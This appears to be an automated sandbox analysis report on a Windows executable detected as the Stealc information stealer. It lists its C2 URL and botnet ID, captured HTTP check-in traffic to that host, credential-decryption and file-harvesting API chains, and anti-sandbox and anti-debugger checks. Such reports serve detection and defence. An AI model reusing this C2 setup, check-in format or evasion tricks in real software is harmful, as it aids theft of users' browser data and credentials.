
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1539396
MD5: e146f5225dc59d28304d4ea38a3c1265
SHA1: f8b22e7a65737087d98f2991180ce701b4140db3
SHA256: 6220e540efb2808a44871e88bc3624ad976feb663c6c445e71e6da8be8695f2a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E146F5225DC59D28304D4EA38A3C1265)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (network traffic)
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5492 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5492 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
0.2.file.exe.8b0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T16:11:56.055353+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.8b0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_008BC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_008B9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_008B7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_008B9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_008C8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_008C38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_008C4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_008BDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_008BE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_008BED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_008C4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_008C3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_008BF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_008B16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_008BDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_008BBE70

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDA
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 45 38 30 34 42 35 46 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a
    Data Ascii:
    ------CGCFIIEBKEGHJJJJJJDA
    Content-Disposition: form-data; name="hwid"

    74E804B5FD762778904926
    ------CGCFIIEBKEGHJJJJJJDA
    Content-Disposition: form-data; name="build"

    doma
    ------CGCFIIEBKEGHJJJJJJDA--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_008B4880
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDA
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 45 38 30 34 42 35 46 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a
    Data Ascii:
    ------CGCFIIEBKEGHJJJJJJDA
    Content-Disposition: form-data; name="hwid"

    74E804B5FD762778904926
    ------CGCFIIEBKEGHJJJJJJDA
    Content-Disposition: form-data; name="build"

    doma
    ------CGCFIIEBKEGHJJJJJJDA--
Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1528463246.0000000000815000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpjZr
Source: file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpt
Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37N

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 | 0_2_00C739C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA8932 | 0_2_00BA8932
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7813D | 0_2_00C7813D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7D205 | 0_2_00C7D205
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C72220 | 0_2_00C72220
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF8B50 | 0_2_00CF8B50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6C311 | 0_2_00B6C311
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7ECCE | 0_2_00C7ECCE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D73C44 | 0_2_00D73C44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C74C13 | 0_2_00C74C13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C79C31 | 0_2_00C79C31
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C695F4 | 0_2_00C695F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C085B0 | 0_2_00C085B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B596D2 | 0_2_00B596D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C766B3 | 0_2_00C766B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6FE5C | 0_2_00C6FE5C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7B7B9 | 0_2_00C7B7B9
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 008B45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: pqeyqbvq ZLIB complexity 0.9948731219259146
Source: file.exe, 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_008C8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_008C3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\D5YE1TEQ.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT url FROM urls LIMIT 10009;
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1821696 > 1048576
Source: file.exe | Static PE information: Raw size of pqeyqbvq is bigger than: 0x100000 < 0x196a00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.8b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pqeyqbvq:EW;oscgfsnm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pqeyqbvq:EW;oscgfsnm:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_008C9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cb443 should be: 0x1caf11
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: pqeyqbvq
Source: file.exe | Static PE information: section name: oscgfsnm
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D530F5 push ebp; mov dword ptr [esp], ecx | 0_2_00D535AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF18E8 push 6417CE30h; mov dword ptr [esp], eax | 0_2_00CF192B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D31092 push 5A3FADBDh; mov dword ptr [esp], eax | 0_2_00D3136D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7389B push 64791129h; mov dword ptr [esp], esp | 0_2_00D738EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3789E push 65038CA3h; mov dword ptr [esp], edx | 0_2_00D378B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C8B8AA push edx; mov dword ptr [esp], 69BC106Fh | 0_2_00C8B8BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D110B3 push 17F702ABh; mov dword ptr [esp], ecx | 0_2_00D110CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D518BE push edi; mov dword ptr [esp], esi | 0_2_00D52299
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D2C857 push esi; mov dword ptr [esp], ebx | 0_2_00D2C878
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D2C857 push ebx; mov dword ptr [esp], ebp | 0_2_00D2C8D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D2C857 push ecx; mov dword ptr [esp], esi | 0_2_00D2C8F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D4B858 push ebp; mov dword ptr [esp], 7DAF0DA4h | 0_2_00D4B944
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CB035 push ecx; ret | 0_2_008CB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D2E00B push ecx; mov dword ptr [esp], 76874402h | 0_2_00D2E103
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7F038 push edi; mov dword ptr [esp], esi | 0_2_00D7F0E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8A841 push 0144C339h; mov dword ptr [esp], ebp | 0_2_00B8A8F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8A841 push 21667DD7h; mov dword ptr [esp], edi | 0_2_00B8A90F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8A841 push 2D246ADEh; mov dword ptr [esp], ebx | 0_2_00B8A972
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8A841 push 7F8A3308h; mov dword ptr [esp], edx | 0_2_00B8A9CE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C9A9C5 push ecx; mov dword ptr [esp], esi | 0_2_00C9A9C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C9A9C5 push 14C8DF79h; mov dword ptr [esp], ebx | 0_2_00C9AA00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push ebp; mov dword ptr [esp], esi | 0_2_00C739DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push 5994B9F2h; mov dword ptr [esp], esi | 0_2_00C73AF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push 30BA9900h; mov dword ptr [esp], eax | 0_2_00C73AFE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push 112720F4h; mov dword ptr [esp], edx | 0_2_00C73C0B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push edx; mov dword ptr [esp], 2324EDBBh | 0_2_00C73C25
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push edx; mov dword ptr [esp], eax | 0_2_00C73C8C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push 754BCBBBh; mov dword ptr [esp], edx | 0_2_00C73D45
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push ecx; mov dword ptr [esp], eax | 0_2_00C73E94
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push edx; mov dword ptr [esp], ecx | 0_2_00C73F2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C739C8 push edx; mov dword ptr [esp], edi | 0_2_00C73FC2
Source: file.exe | Static PE information: section name: pqeyqbvq entropy: 7.953729049995973

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_008C9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13655
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B12082 second address: B1208E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F6398F5B496h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1208E second address: B120A8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F6398F5EC9Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B11987 second address: B11999 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6398F5B496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F6398F5B496h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C84B90 second address: C84BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6398F5ECA1h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C84BAD second address: C84BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C84BB1 second address: C84BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6398F5ECA1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C83B7F second address: C83B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C83D1C second address: C83D26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6398F5EC9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C83D26 second address: C83D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C83E95 second address: C83EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6398F5EC9Bh 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
